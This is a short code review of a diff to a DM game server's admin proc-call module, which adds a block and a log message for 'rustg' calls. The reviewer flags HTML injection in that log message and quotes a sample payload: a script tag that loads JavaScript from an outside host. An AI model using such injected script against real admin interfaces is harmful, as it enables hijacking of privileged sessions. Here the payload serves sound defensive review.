code/modules/admin/callproc/callproc.dm

```diff
@@ -90,6 +90,12 @@ GLOBAL_PROTECT(LastAdminCalledProc)
 		to_chat(usr, "Calling Del() is not allowed", confidential = TRUE)
 		return
 
+	if(findtextEx(trim(lowertext(procname)), "rustg"))
+		var/message = "[key_name(usr)] attempted to call [procname] with arguments: [english_list(arguments)]. Rustg calls are not allowed."
```

Comment:
HTML injection vulnerability here. Someone can call `WrapAdminProcCall` with an arg of `rustg <script src="https://my.naughty/script.js"></script>`.